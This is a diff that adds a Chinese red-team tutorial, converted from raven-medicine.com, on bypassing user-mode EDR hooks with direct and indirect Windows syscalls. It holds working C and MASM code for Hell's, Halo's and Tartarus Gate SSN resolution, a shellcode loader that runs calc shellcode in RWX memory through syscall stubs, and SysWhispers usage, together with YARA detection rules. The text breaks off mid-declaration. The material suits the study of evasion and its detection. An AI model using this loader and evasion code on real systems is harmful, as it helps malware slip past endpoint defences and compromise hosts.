diff --git "a/md/\350\260\203\347\224\250 syscall \345\256\236\347\216\260\347\224\250\346\210\267\346\200\201 Hook \347\273\225\350\277\207 | Raven Medicine.md" "b/md/\350\260\203\347\224\250 syscall \345\256\236\347\216\260\347\224\250\346\210\267\346\200\201 Hook \347\273\225\350\277\207 | Raven Medicine.md" new file mode 100644 index 000000000..db614f7ef --- /dev/null +++ "b/md/\350\260\203\347\224\250 syscall \345\256\236\347\216\260\347\224\250\346\210\267\346\200\201 Hook \347\273\225\350\277\207 | Raven Medicine.md" @@ -0,0 +1,981 @@ +> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [raven-medicine.com](https://raven-medicine.com/books/ec8ce/page/syscallhook) + +> 在上个小节,我们主要是通过对 ntdll 模块进行覆盖或者补丁来移除 hook 实现用户态 hook 的绕过。但是这些... + +在上个小节,我们主要是通过对 ntdll 模块进行覆盖或者补丁来移除 hook 实现用户态 hook 的绕过。但是这些方法涉及到对 ntdll 的纂改,以及对内存权限的修改,具有一定的风险。实际上,我们还有其他途径来实现 hook 的绕过。 + +### **提取 syscall 号码** + +我们可以在 C 项目里定义汇编函数,来实现 NTAPI。我们知道,只需要最少 4 条指令,我们便能成功执行 syscall。但在执行 syscall 之前,我们需要获得目标函数的 SSN。我们可以从磁盘中读取一份干净的 ntdll 并解析得到 SSN,但从磁盘中读取 ntdll 会显得有些可疑,因此最好是解析载入的 ntdll 并设法获得 SSN。 + +#### **Hells Gate** + +Hells Gate 通过 PEB Walking 的方法得到加载的 ntdll 地址以及想要获得 SSN 的函数地址。通过对关键字节的比较来确定这是一个有效的 syscall stub,从而提取出 SSN。其实上个小节我们已经用了这个逻辑了。 + +原始代码关键部分如下: + +``` +if (*((PBYTE)pFunctionAddress + cw) == 0x4c + && *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b + && *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1 + && *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8 + && *((PBYTE)pFunctionAddress + 6 + cw) == 0x00 + && *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) { + BYTE high = *((PBYTE)pFunctionAddress + 5 + cw); + BYTE low = *((PBYTE)pFunctionAddress + 4 + cw); + pVxTableEntry->wSystemCall = (high << 8) | low; + break; +} + +``` + +但是,如果要搜索的函数被 hook 了,那么 SSN 可能不会存在于 syscall stub 里 (取决于是什么 EDR 以及覆盖了哪些指令),这样的话,就不能成功获得 ssn 了。因此,Halos Gate 对此进行了改善。 + +#### **Halos Gate** + +我们发现,在 ntdll 里,随着地址的增高,NTAPI 的 SSN 是递增的,反之则递减。因此,如果我们想要搜索的 NTAPI 被 hook 了,可以向上和向下同时继续搜索,例如往下搜索了 **2 跳**发现了一个未被 hook 的 NTAPI,那么要搜索的 NTAPI 的 
SSN 就是这个未被 hook 的 NTAPI 的 SSN 再减去 2,即 **Desired_SSN = Clean_SSN - Hop**。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/MygmjRJ3KjEvKnoL-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/MygmjRJ3KjEvKnoL-image.png) + +关键代码部分如下: + +``` +int GoUp = -32; +int GoDown = 32; +// If the first instruction of the syscall is an unconditional jump (aka it's hooked) +if (*((PBYTE)pFunctionAddress) == 0xe9) { + // Search beginning pattern of syscall stub through 500 function up and down from our location + for (WORD index = 1; index <= 500; index++) { + // Search the beginning of a syscall stub in the next function down + if (*((PBYTE)pFunctionAddress + index * GoDown) == 0x4c + && *((PBYTE)pFunctionAddress + 1 + index * GoDown) == 0x8b + && *((PBYTE)pFunctionAddress + 2 + index * GoDown) == 0xd1 + && *((PBYTE)pFunctionAddress + 3 + index * GoDown) == 0xb8 + && *((PBYTE)pFunctionAddress + 6 + index * GoDown) == 0x00 + && *((PBYTE)pFunctionAddress + 7 + index * GoDown) == 0x00) { + BYTE high = *((PBYTE)pFunctionAddress + 5 + index * GoDown); + BYTE low = *((PBYTE)pFunctionAddress + 4 + index * GoDown); + // subtract the index from the neighbour's syscall identifier to find the one of our target function + // (parenthesized because '-' binds tighter than '|') + pVxTableEntry->wSystemCall = ((high << 8) | low) - index; + return TRUE; + } + // Search the beginning of a syscall stub in the next function up + if (*((PBYTE)pFunctionAddress + index * GoUp) == 0x4c + && *((PBYTE)pFunctionAddress + 1 + index * GoUp) == 0x8b + && *((PBYTE)pFunctionAddress + 2 + index * GoUp) == 0xd1 + && *((PBYTE)pFunctionAddress + 3 + index * GoUp) == 0xb8 + && *((PBYTE)pFunctionAddress + 6 + index * GoUp) == 0x00 + && *((PBYTE)pFunctionAddress + 7 + index * GoUp) == 0x00) { + BYTE high = *((PBYTE)pFunctionAddress + 5 + index * GoUp); + BYTE low = *((PBYTE)pFunctionAddress + 4 + index * GoUp); + // add the index to the neighbour's syscall identifier to find the one of our target function + 
pVxTableEntry->wSystemCall = ((high << 8) | low) + index; + return TRUE; + } +} + +``` + +代码里以 32 字节作为相邻 syscall stub 的间距 (GoUp / GoDown),最大搜索跳数则为 500,搜索时确实需要注意边界。Halos Gate 也有个小局限性,它以第一条指令是否是 jmp 从而判断函数是否被 hook 了。我们之前说了,不同的 EDR 覆盖的指令不同,有的 EDR 覆盖的不是第 1 条指令,可以是 syscall 之前的任何指令。例如 CrowdStrike 覆盖的是第 2 条指令。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/G2gtx7JTwdq1Kc7F-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/G2gtx7JTwdq1Kc7F-image.png) + +#### **Tartarus Gate** + +Tartarus Gate 相比 Halos Gate 的改动比较小,主要是考虑了更多 EDR 可能 hook 的情况,例如上面截图所示的情况。对前 4 字节逐一对比,还是相对比较可靠的判断。当然了,hook 导致的指令覆盖可能在 syscall 指令之前的任何字节,如果不放心的话,可以增加更多字节比较。 + +下面的代码是我个人对动态获取 SSN 的实现: + +``` +#include <windows.h> +#include <winternl.h> +#include <intrin.h> +#include <stdio.h> +#include <string.h> + + +//Get module handle for ntdll and kernel32 at the same time +void GetModule(HMODULE* ntdll, HMODULE* kernel32) +{ + PPEB peb = (PPEB)(__readgsqword(0x60)); + PPEB_LDR_DATA ldr = *(PPEB_LDR_DATA*)((PBYTE)peb + 0x18); //PPEB_LDR_DATA pLdr = pPeb->Ldr; + PLIST_ENTRY ntdlllistentry = *(PLIST_ENTRY*)((PBYTE)ldr + 0x30); + *ntdll = *(HMODULE*)((PBYTE)ntdlllistentry + 0x10); + PLIST_ENTRY kernelbaselistentry = *(PLIST_ENTRY*)((PBYTE)ntdlllistentry); + PLIST_ENTRY kernel32listentry = *(PLIST_ENTRY*)((PBYTE)kernelbaselistentry); + *kernel32 = *(HMODULE*)((PBYTE)kernel32listentry + 0x10); +} + +// Distance in bytes between two adjacent syscall stubs, as assumed by the neighbour search below. +#define SYSCALL_STUB_SIZE 0x20 + +// Returns TRUE when pStub starts with the bytes 4C 8B D1 B8 (mov r10, rcx; mov eax, imm32). +static BOOL IsCleanStub(const BYTE* pStub) +{ + return pStub[0] == 0x4C && pStub[1] == 0x8B && pStub[2] == 0xD1 && pStub[3] == 0xB8; +} + +// Reads the SSN of a clean stub: the little-endian 16-bit value at offsets 4 (low) and 5 (high). +static WORD ReadStubSSN(const BYTE* pStub) +{ + return (WORD)(pStub[4] | (pStub[5] << 8)); +} + +// Returns the SSN of the stub at pFunctionAddress. A clean stub is read directly; otherwise up to +// maxOffset neighbouring stubs are probed in both directions and the SSN is derived from the first +// clean neighbour. Returns (WORD)-1 when no clean stub is found. +WORD QuickGetSSN(PBYTE pFunctionAddress) +{ + const int maxOffset = 10; // You can adjust this based on your requirements. + int offset; + WORD ssn; + if (IsCleanStub(pFunctionAddress)) + { + printf("The function is clean\n"); + ssn = ReadStubSSN(pFunctionAddress); + printf("ID of searched function is: 0x%x\n", ssn); + return ssn; + } + + printf("The function is hooked\n"); + // Search both upwards and downwards. 
+ for (offset = 1; offset <= maxOffset; ++offset) + { + // Check upwards: a stub at a lower address has a lower SSN, so add the hop count back. + PBYTE checkAddress = pFunctionAddress - (SYSCALL_STUB_SIZE * offset); + if (IsCleanStub(checkAddress)) + { + ssn = ReadStubSSN(checkAddress); + printf("Clean sequence found upwards at offset -0x%x, SSN of the unhooked function is 0x%x\n", offset, ssn); + printf("SSN of searched NTAPI is 0x%x\n", (ssn + offset)); + return (WORD)(ssn + offset); + } + + // Check downwards: a stub at a higher address has a higher SSN, so subtract the hop count. + checkAddress = pFunctionAddress + (SYSCALL_STUB_SIZE * offset); + if (IsCleanStub(checkAddress)) + { + ssn = ReadStubSSN(checkAddress); + printf("Clean sequence found downwards at offset 0x%x, SSN of the unhooked function is 0x%x\n",offset, ssn); + printf("SSN of searched NTAPI is 0x%x\n", (ssn - offset)); + return (WORD)(ssn - offset); + } + } + // No clean stub within maxOffset hops in either direction. + return (WORD)-1; +} + +// Looks up funcName (case-insensitive) in the export table of hModule and returns its SSN. +// Returns (WORD)-1 when the PE headers are invalid, the name is not exported, or no SSN can be recovered. +WORD GetSSNByName(IN HMODULE hModule, const CHAR* funcName) +{ + PBYTE pBase = (PBYTE)hModule; + WORD ssn; + PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase; + if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) + return (WORD)-1; + PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew); + if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) + return (WORD)-1; + + IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader; + PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); + PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames); + PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions); + PWORD FunctionOrdinalArray = 
(PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals); + // The name and name-ordinal arrays hold NumberOfNames entries (not NumberOfFunctions). + for (DWORD i = 0; i < pImgExportDir->NumberOfNames; i++) + { + CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]); + if (_stricmp(funcName, pFunctionName) != 0) + continue; + + // The name-ordinal array maps the i-th name to its slot in the address array. + PBYTE pFunctionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]); + if (IsCleanStub(pFunctionAddress)) + { + printf("NTAPI %s may not be hooked\n", funcName); + ssn = ReadStubSSN(pFunctionAddress); + } + else + { + printf("NTAPI %s is hooked, check surrounding functions\n", funcName); + ssn = QuickGetSSN(pFunctionAddress); + } + printf("Syscall number of function %s is: 0x%x\n", pFunctionName, ssn); + return ssn; + } + return (WORD)-1; +} + +int main() +{ + HMODULE ntdll; + HMODULE kernel32; + GetModule(&ntdll, &kernel32); + printf("ntdll base address: %p\n", ntdll); + printf("kernel32 base address: %p\n", kernel32); + WORD ssn = GetSSNByName(ntdll, "NtOpenProcess"); + printf("SSN of the NtOpenProcess is 0x%x\n", ssn); + return 0; +} + +``` + +我们人为地给 NtOpenProcess,以及其前向 2 个函数、后向 3 个函数都进行了指令覆盖来模拟 hook。最终,程序成功地发现前向第 3 个函数是没有被 hook 的,提取了其 SSN 后加上 3,得到了 NtOpenProcess 的 SSN。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/P2cJOSA5Bf20xRRH-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/P2cJOSA5Bf20xRRH-image.png) + +### **直接调用 Syscall** + +有了目标函数的 SSN,我们便可以用汇编代码实现 NTAPI 并进行调用了。这里,我们将先讨论直接调用 syscall。我们以经典的 VirtualAlloc + WriteProcessMemory(或者是其他复制数据的函数) + CreateThread + WaitForSingleObject 的代码执行方法为例,当然了,我们使用的是这些 API 的 NTAPI 版本,执行 calc 的 shellcode。 + +#### **直接 syscall** + +在 C 源代码文件里定义 NtAllocateVirtualMemory 函数以及所需的结构体 (尽管该 NTAPI 没有所需的结构体),而在 asm 
文件里用汇编代码实现函数功能,这里我们实现 NtAllocateVirtualMemory 的 syscall stub 即可。 **EXTERN_C 宏**允许链接器将该函数定义与汇编代码链接起来,需要保持名称相同。这样,我们就能像调用一般函数一样调用定义的汇编函数了。 + +``` +EXTERN_C NTSTATUS NtAllocateVirtualMemory( + IN HANDLE ProcessHandle, + IN OUT PVOID* BaseAddress, + IN ULONG ZeroBits, + IN OUT PSIZE_T RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +``` + +``` +.code +<...SNIP...> + +NtAllocateVirtualMemory PROC + mov r10, rcx + mov rax, 18h + syscall + ret +NtAllocateVirtualMemory ENDP + +<...SNIP...> +end + +``` + +以此类推,我们接着去定义其他所需的函数,例如 NtWriteVirtualMemory,NtCreateThreadEx,NtWaitForSingleObject,NtClose 等。因为这些 NTAPI 大都没有微软官方的文档,因此我们需要借助搜索引擎参考已有项目对其的用法。完成后的代码如下: + +**DirectSyscall.c** 代码 + +``` +#include +#include + +typedef struct _PS_ATTRIBUTE +{ + ULONG Attribute; + SIZE_T Size; + union + { + ULONG Value; + PVOID ValuePtr; + } u1; + PSIZE_T ReturnLength; +} PS_ATTRIBUTE, * PPS_ATTRIBUTE; + +typedef struct _UNICODE_STRING +{ + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; +} UNICODE_STRING, * PUNICODE_STRING; + +typedef struct _OBJECT_ATTRIBUTES +{ + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; + +typedef struct _PS_ATTRIBUTE_LIST +{ + SIZE_T TotalLength; + PS_ATTRIBUTE Attributes[1]; +} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; + +EXTERN_C NTSTATUS NtAllocateVirtualMemory( + IN HANDLE ProcessHandle, + IN OUT PVOID* BaseAddress, + IN ULONG ZeroBits, + IN OUT PSIZE_T RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +EXTERN_C NTSTATUS NtWriteVirtualMemory( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN PVOID Buffer, + IN SIZE_T NumberOfBytesToWrite, + OUT PSIZE_T NumberOfBytesWritten OPTIONAL); + +EXTERN_C NTSTATUS NtCreateThreadEx( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN HANDLE ProcessHandle, + IN PVOID StartRoutine, + 
IN PVOID Argument OPTIONAL, + IN ULONG CreateFlags, + IN SIZE_T ZeroBits, + IN SIZE_T StackSize, + IN SIZE_T MaximumStackSize, + IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL); + +EXTERN_C NTSTATUS NtWaitForSingleObject( + IN HANDLE ObjectHandle, + IN BOOLEAN Alertable, + IN PLARGE_INTEGER TimeOut OPTIONAL); + +EXTERN_C NTSTATUS NtClose( + IN HANDLE Handle); + + +int main() { + // calc.exe shellcode + unsigned char code[] = "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"; + + + LPVOID allocation_start; + SIZE_T allocation_size = sizeof(code); + HANDLE hThread; + NTSTATUS status; + + allocation_start = nullptr; + + + // Allocate Virtual Memory + if (NtAllocateVirtualMemory(GetCurrentProcess(), &allocation_start, 0, (PULONG64)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)==0) + printf("Memory allocated at %p\n", allocation_start); + else + printf("Allocated failed, Error code is %d\n",GetLastError()); + + // Copy shellcode into allocated memory + if (NtWriteVirtualMemory(GetCurrentProcess(), allocation_start, code, sizeof(code), 0)==0) + printf("Copied successfully\n"); + else + printf("Copied failed, Error code is %d\n", GetLastError()); + + + if (NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, GetCurrentProcess(), (LPTHREAD_START_ROUTINE)allocation_start, NULL, FALSE, NULL, NULL, NULL, NULL)==0) + printf("Executed 
successfully\n"); + else + printf("Executed failed, Error code is %d\n", GetLastError()); + + // Wait for the end of the thread and close the handle + NtWaitForSingleObject(hThread, FALSE, NULL); + NtClose(hThread); + + return 0; +} + +``` + +**stub.asm** 代码 + +``` +.code + +NtAllocateVirtualMemory PROC + mov r10, rcx + mov rax, 18h + syscall + ret +NtAllocateVirtualMemory ENDP + +NtWriteVirtualMemory PROC + mov r10, rcx + mov rax, 3Ah + syscall + ret +NtWriteVirtualMemory ENDP + +NtCreateThreadEx PROC + mov r10, rcx + mov rax, 0C2h + syscall + ret +NtCreateThreadEx ENDP + +NtWaitForSingleObject PROC + mov r10, rcx + mov rax, 4 + syscall + ret +NtWaitForSingleObject ENDP + +NtClose PROC + mov r10, rcx + mov rax, 0Fh + syscall + ret +NtClose ENDP + + +end + +``` + +为了能编译 masm 文件,我们右键项目,选择 **Build Dependencies -> Build Customizations**,勾选 **masm**。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/ouDmEOA6Lvjc01pk-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/ouDmEOA6Lvjc01pk-image.png) + +右键 asm 代码文件选择属性,**General -> Item Type** 选项选择 **Microsoft Macro Assembler**。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/QJuqgked4UhodQgC-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/QJuqgked4UhodQgC-image.png) + +这样我们便能编译项目里的 masm 代码了。编译后运行程序,我们发现 shellcode 得以成功运行。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/o6aHs00RAIYUxxcO-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/o6aHs00RAIYUxxcO-image.png) + +不过直接 syscall 调用的弊端也是比较显著的,汇编函数在编译后成为操作码存在于程序的代码区,汇编代码与操作码是可预测的一一对应的关系。因此,如果没有对 syscall stub 进行混淆的话,我们可以用如下 yara 规则来检测包含直接 syscall 调用的程序: + +``` +rule direct_syscall +{ + meta: + description = "Hunt for direct syscall" + + strings: + $s1 = {4c 8b d1 48 c7 c0 ?? ?? ?? ?? 0f 05 c3} + $s2 = {4C 8b d1 b8 ?? ?? ?? ?? 
0F 05 C3} + condition: + #s1 >=1 or #s2 >=1 +} + +``` + +我们定义了 5 个 syscall stub,都被检测到了。我们可以插入一些 **NOP** 类 (即无实际意义、不影响运行结果) 的指令用于混淆 syscall stub。但即便有混淆,0xf 0x5(syscall) 指令始终存在于代码区,这是可疑的。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/EEhQPYmzhhd5SM5L-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/EEhQPYmzhhd5SM5L-image.png) + +此外,从调用栈的视角,是我们程序的某一函数发起了 syscall,而不是 ntdll 空间内的 NTAPI,这是非常可疑的。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/eDG3VYrocukn8BnY-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/eDG3VYrocukn8BnY-image.png) + +#### **syswhisper 1&2** + +Syswhisper 1 和 2 可以自动地帮我们生成 C 项目的头文件以及 asm 文件,方便我们发起直接 syscall。Syswhisper 1 是通过检查操作系统的版本从而确定给定 NTAPI 的 SSN,这算是硬编码了,不够灵活。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/cgSWm1nMFyQ8tEVc-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/cgSWm1nMFyQ8tEVc-image.png) + +syswhisper 2 将所有 **Zw** 开头的函数按照地址排序存储进数组里,**SSN** 与**函数地址高低**是正相关,因此,要寻找的函数的 SSN 即为该函数地址在数组里的索引。 + +至于为什么以 Zw 开头,因为其实 NTAPI 的 NT 与 ZW 版本指向同一地址。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/jYBJYtjOb4rwiePZ-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/jYBJYtjOb4rwiePZ-image.png) + +使用 syswhisper 2 的 python 脚本生成所需的**头文件,c 文件**以及 **asm 文件**,可以生成所有的 NTAPI 的相关代码,也可以只生成指定或常用的 NTAPI 的。 + +因为有 asm 文件,所以我们依旧需要启用 masm。把生成的**头文件**加入到 **Header Files** 中,**c 文件**与 **asm 文件**添加至 **Source Files** 中。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/MZRsYBTvJXcqXhMR-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/MZRsYBTvJXcqXhMR-image.png) + +对于主函数的代码,我们可以复用之前的,但别忘了添加 syswhisper2 生成的头文件。就这样,我们也成功执行了 shellcode。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/qObsEgByktoIErkR-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/qObsEgByktoIErkR-image.png) + 
+我们可以根据 asm 文件中的 WhisperMain 函数代码创建 yara 规则。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/sppIpWkdxz0AfGDl-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/sppIpWkdxz0AfGDl-image.png) + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/xx6UlpxagAcDwBB4-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/xx6UlpxagAcDwBB4-image.png) + +样本规则如下所示: + +``` +rule syswhisper2 +{ + meta: + description = "Hunt for syswhisper2 generated asm code" + + strings: + $s1 = {58 48 89 4C 24 08 48 89 54 24 10 4C 89 44 24 18 4C 89 4C 24 20 48 83 EC 28 8B 0D ?? ?? 00 00 E8 ?? ?? ?? ?? 48 83 C4 28 48 8B 4C 24 08 48 8B 54 24 10 4C 8B 44 24 18 4C 8B 4C 24 20 4C 8B D1 0F 05 C3} + condition: + #s1 >=1 +} + +``` + +这样,我们用 yara 检测到了使用 syswhisper2 的程序。当然了,可以对该函数进行混淆,不过调用栈的嫌疑也很大。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/agYUmPZMOvbHIpNn-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/agYUmPZMOvbHIpNn-image.png) + +### **间接调用 Syscall** + +因为直接 syscall 在调用栈上有着难以掩盖的检测点,间接调用 syscall 应运而生。间接调用 syscall 这个分类下其实也衍生出了多种方法,也包括我近期提出的 MutationGate。 + +#### **间接 syscall** + +间接 syscall 的宗旨是与其直接在程序内执行 syscall 指令,不如在 **ntdll 模块里**寻找一条 syscall 指令,记录其地址,并在项目中用汇编代码定义的 syscall stub 中,将原本的 **syscall 指令**替换为 **jmp ** 指令。如下所示: + +``` +NtAllocateVirtualMemory PROC + mov r10, rcx + mov eax, (ssn of NtAllocateVirtualMemory) + jmp (address of a syscall instruction) + ret +NtAllocateVirtualMemory ENDP + +``` + +我们可以用如下代码获得给定 NTAPI 的 syscall 指令的地址。不过,从**函数调用成功**的角度来看,我们其实不是非得要获得目标 NTAPI 的 syscall 指令的地址。syscall 是一种特殊的 call 指令,根据 RAX/EAX 的值来确定内核层的对应函数,而非 syscall 指令所在的地址。也就是说,如果我们能在其他 DLL 中找到 syscall 指令,也是可以用的。如果我们刻意地选用良性 NTAPI 的 syscall 指令而非目标 NTAPI 的,可能会带来规避上的优势,但也可能适得其反,这取决于 EDR 的检测逻辑。毕竟,在内核层从**调用栈**或**返回地址**的角度是可以看出端倪的。 + +``` +#include +#include +#include +#include +#include + + +//Get module handle for ntdll and kernel32 at the same time +void GetModule(HMODULE* 
ntdll, HMODULE* kernel32) +{ + PPEB peb = (PPEB)(__readgsqword(0x60)); + PPEB_LDR_DATA ldr = *(PPEB_LDR_DATA*)((PBYTE)peb + 0x18); //PPEB_LDR_DATA pLdr = pPeb->Ldr; + PLIST_ENTRY ntdlllistentry = *(PLIST_ENTRY*)((PBYTE)ldr + 0x30); + *ntdll = *(HMODULE*)((PBYTE)ntdlllistentry + 0x10); + PLIST_ENTRY kernelbaselistentry = *(PLIST_ENTRY*)((PBYTE)ntdlllistentry); + PLIST_ENTRY kernel32listentry = *(PLIST_ENTRY*)((PBYTE)kernelbaselistentry); + *kernel32 = *(HMODULE*)((PBYTE)kernel32listentry + 0x10); +} + + +PBYTE GetSyscallAddr(IN HMODULE hModule, const CHAR* funcName) +{ + PBYTE pBase = (PBYTE)hModule; + PBYTE syscall; + + PIMAGE_DOS_HEADER pImgDosHdr = (PIMAGE_DOS_HEADER)pBase; + if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) + return 0; + PIMAGE_NT_HEADERS pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew); + if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) + return 0; + + IMAGE_OPTIONAL_HEADER ImgOptHdr = pImgNtHdrs->OptionalHeader; + PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); + PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames); + PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions); + PWORD FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals); + for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++) + { + CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]); + PBYTE pFunctionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]); + if (_stricmp(funcName, pFunctionName) == 0) + { + syscall = (pFunctionAddress + 0x12); + return syscall; + } + } + return 0; +} + +int main() +{ + HMODULE ntdll; + HMODULE kernel32; + GetModule(&ntdll, &kernel32); + printf("ntdll base address: %p\n", ntdll); + printf("kernel32 base address: %p\n", kernel32); + PBYTE syscall_addr = GetSyscallAddr(ntdll, "NtOpenProcess"); + printf("Address of syscall instruction is 
0x%p\n", syscall_addr); + return 0; +} + +``` + +这样,我们成功地获得了一条 syscall 指令的地址,与我们在 WinDBG 中查看到的一致。 + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/QvP1WKcniSqgyRGA-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/QvP1WKcniSqgyRGA-image.png) + +[![](https://raven-medicine.com/uploads/images/gallery/2024-03/scaled-1680-/IfOQ0dJ983BLbuqv-image.png)](https://raven-medicine.com/uploads/images/gallery/2024-03/IfOQ0dJ983BLbuqv-image.png) + +有了 syscall 指令的地址,那么可以得到如下代码 (依旧启用 masm): + +**indirectsyscall.cpp** 代码 + +``` +#include +#include +#include +#include +#include + + +extern "C" { + UINT_PTR syscall_addr1; + UINT_PTR syscall_addr2; + UINT_PTR syscall_addr3; + UINT_PTR syscall_addr4; + UINT_PTR syscall_addr5; +} + +typedef struct _PS_ATTRIBUTE +{ + ULONG Attribute; + SIZE_T Size; + union + { + ULONG Value; + PVOID ValuePtr; + } u1; + PSIZE_T ReturnLength; +} PS_ATTRIBUTE, * PPS_ATTRIBUTE; + + +typedef struct _PS_ATTRIBUTE_LIST +{ + SIZE_T TotalLength; + PS_ATTRIBUTE Attributes[1]; +} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; + +EXTERN_C NTSTATUS NtAllocateVirtualMemory( + IN HANDLE ProcessHandle, + IN OUT PVOID* BaseAddress, + IN ULONG ZeroBits, + IN OUT PSIZE_T RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +EXTERN_C NTSTATUS NtWriteVirtualMemory( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN PVOID Buffer, + IN SIZE_T NumberOfBytesToWrite, + OUT PSIZE_T NumberOfBytesWritten OPTIONAL); + +EXTERN_C NTSTATUS NtCreateThreadEx( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, + IN HANDLE ProcessHandle, + IN PVOID StartRoutine, + IN PVOID Argument OPTIONAL, + IN ULONG CreateFlags, + IN SIZE_T ZeroBits, + IN SIZE_T StackSize, + IN SIZE_T MaximumStackSize, + IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL); + +EXTERN_C NTSTATUS 